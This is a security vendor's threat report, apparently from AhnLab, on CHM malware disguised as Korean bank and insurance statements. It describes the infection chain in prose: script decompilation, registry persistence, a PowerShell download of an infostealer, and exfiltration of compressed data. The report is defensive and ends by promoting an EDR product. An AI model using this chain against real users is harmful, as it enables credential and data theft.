AhnLab Security Emergency response Center (ASEC) previously covered CHM-type malware strains impersonating security companies and financial institutes. This post will cover recently identified CHM strains impersonating Korean financial institutes and insurance companies as they were found being distributed to steal information. The distribution occurred on the 17th (Monday), when statements are regularly sent to users whose payment schedule to financial institutes falls on the 25th of each month. It is certainly possible for those who have the same schedule to make a misjudgment and execute the file. AhnLab’s EDR products record in detail the histories of the new malware strains being run due to users’ misconceptions. The damage details and exfiltrated files can also be identified.
This post will provide information on the distribution method and details of the CHM malware. It explains how AhnLab’s EDR product records the process from the malware strain being executed from CHM files to the exfiltration behavior of Infostealer.
Figure 1 shows the EDR detection diagram when the CHM-type malware was executed. The file hh.exe is a normal Windows program and is a process that executes Windows help files (*.CHM). The subsequent process execution relationship shows the relationship between CMD, a script and command interface process, and alg.exe, an Infostealer.
Figure 2 shows the behavior detection of a CHM file being decompiled into the “C:\Users\Public\Libraries” path mentioned in the blog post above. You can see the command line used for decompilation.
Figure 3 shows a command line that runs “Docs.jse”, the file created through decompilation, with wscript. The content is the same as the script covered in the past blog post.
Figure 4 shows the detection of the malicious behaviors of the executed wscript. It adds a registry key for persistent infection. The name added to the registry and the data can be verified, and these details can be used to take measures against recurrent infection. The history of executing the command line interface cmd with a script after registering to autorun can be seen. Examining the executed command line shows that PowerShell is used to download the malware strain from the distribution site into the TEMP path and run with start.
Figure 5 shows the EDR behavior detection screen for the downloaded Infostealer and Figure 6 shows the decompilation of this malware strain. It is comparatively small in size and exfiltrates data such as user PC, directory, and browser information. It also has a feature for sending the stolen data in a compressed file format. As shown in the AhnLab EDR product’s detection details (see Figure 5), the compressed file is created in the Public\Pictures path and includes the stolen data. The exfiltrated information is then transmitted to the threat actor’s server.
Beyond the information already discussed, AhnLab EDR provides additional details that aid in tracking stolen information and its destination. It also shows how the malware strain was executed. The method of distributing malware disguised as statements that are sent according to the payment schedule for financial institutes can lead users to make mistakes. AhnLab’s EDR products can be used to check for such threats that may cause harm through a single mistake, and the detection details can be used to form a response.
AhnLab EDR protects the endpoint environment by delivering behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting. For more information about the product, please visit our official website.